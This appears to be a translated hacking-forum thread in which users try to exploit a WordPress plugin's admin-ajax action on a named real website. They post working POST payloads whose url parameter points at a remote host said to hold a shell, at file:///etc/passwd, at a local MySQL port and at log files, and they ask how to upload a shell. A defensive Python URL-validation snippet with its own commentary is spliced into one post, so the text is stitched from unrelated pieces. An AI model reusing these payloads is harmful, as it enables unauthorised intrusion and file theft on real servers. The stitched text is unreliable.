Help with an interesting case

Discussion in 'Песочница' (Sandbox) started by androd, 28 Sep 2016.

  1. androd

    androd Banned

    Joined:
    16 Sep 2016
    Messages:
    19
    Likes Received:
    1
    Reputations:
    2
    Here it is, actually:
    https://www.neu.de/pages/regionen/wp-admin/admin-ajax.php
    This goes into the headers:
    Content-Length: 92
    Content-Type: application/x-www-form-urlencoded
    Referer: http://www.neu.de:80/
    Host: www.neu.de
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*
    and here is the POST body:
    action=lp_get_bl_singles&req_offer_nonce=2a2388ca12&url=http://lux-ledi.info/pas.txt
    It is not processed as PHP but as HTML, even though the PHP files from WordPress work.
    How do I upload a shell?
     
  2. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Is this how you cope with PMS?
     
  3. androd

    I didn't understand you.
     
  4. androd

    There's an LFI in the POST request.
     
  5. BabaDook

    http://lux-ledi.info/
    Is that your site?

    If it's LFI, then you're doing it wrong.
     
  6. androd

    No, not mine :) there's just a shell uploaded on it. So how should it be done correctly then?
     
  7. BabaDook

    That's not an include, it's something else.
     
  8. androd

    action=lp_get_bl_singles&req_offer_nonce=2a2388ca12&url=file:///etc/passwd
    Do it like this.
     
  9. BabaDook

    Yeah, interesting, I'll take a look when I get home.
     
  10. androd

    If you remove the line
    Content-Type: application/x-www-form-urlencoded
    it stops working; maybe something needs tweaking here.
     
  11. BabaDook

    Nothing comes to mind other than scanning and reading configs.

    PHP:
    action=lp_get_bl_singles
    &req_offer_nonce=2a2388ca12
    &url=http://127.0.0.1:3306

    &req_offer_nonce=2a2388ca12
    &url=file:///etc/hosts
    Need to look at the configs; as an option, it might be possible to read the site's config, but I'm not sure, PHP might not be served back as text after all.
     
  12. BabaDook

    PHP:
    action=lp_get_bl_singles
    &req_offer_nonce=2a2388ca12
    &url=file:///home/log/nginx/default.access.log
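The defender-side counterpart to what the thread is probing: the `url` parameter behind `lp_get_bl_singles` follows whatever scheme and host it is handed. This is an added example, not code from the forum post or from the plugin involved; it shows the validation a server-side fetch should apply before following a user-supplied URL, with a constructed DNS table (`CONSTRUCTED_DNS`, `fake_resolver`) so it runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed sample inputs mirroring the request shapes seen in the thread:
# a public URL, a file:// URL and a loopback service probe.
SAMPLE_URLS = [
    "http://example.com/pas.txt",
    "file:///etc/passwd",
    "http://127.0.0.1:3306",
]

# Constructed name->address table standing in for real DNS during the demo.
CONSTRUCTED_DNS = {
    "example.com": {"93.184.216.34"},
    "127.0.0.1": {"127.0.0.1"},
    "internal.local": {"10.0.0.5"},
}

def fake_resolver(host):
    """Offline stand-in for DNS; raises KeyError for unknown names."""
    return CONSTRUCTED_DNS[host]

def real_resolver(host):
    """Resolve a hostname to every address it maps to (IPv4 and IPv6)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def is_safe_fetch_url(url, resolver=real_resolver):
    """True only for http(s) URLs without embedded credentials whose host
    resolves exclusively to globally routable addresses."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False  # rejects file://, php://, gopher:// and friends
    if not parts.hostname or parts.username or parts.password:
        return False  # empty host, or user:pass@host trickery
    try:
        addrs = resolver(parts.hostname)
        # Every resolved address must be public: this rejects loopback,
        # RFC 1918, link-local (169.254.x, cloud metadata) and reserved ranges.
        return bool(addrs) and all(ipaddress.ip_address(a).is_global for a in addrs)
    except (OSError, ValueError, KeyError):
        return False  # resolution failure or unparsable address: fail closed

def classify(urls, resolver=real_resolver):
    """Map each URL to its verdict; handy for reviewing a batch of requests."""
    return {u: is_safe_fetch_url(u, resolver) for u in urls}
```

Validating and then fetching by hostname still leaves a DNS rebinding window; a hardened fetcher connects to the address it validated rather than resolving a second time.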
     
  13. androd

    Content-Type: application/x-www-form-urlencoded
    This line is where the whole point lies....
     
  14. androd

    Did anyone get anywhere with it?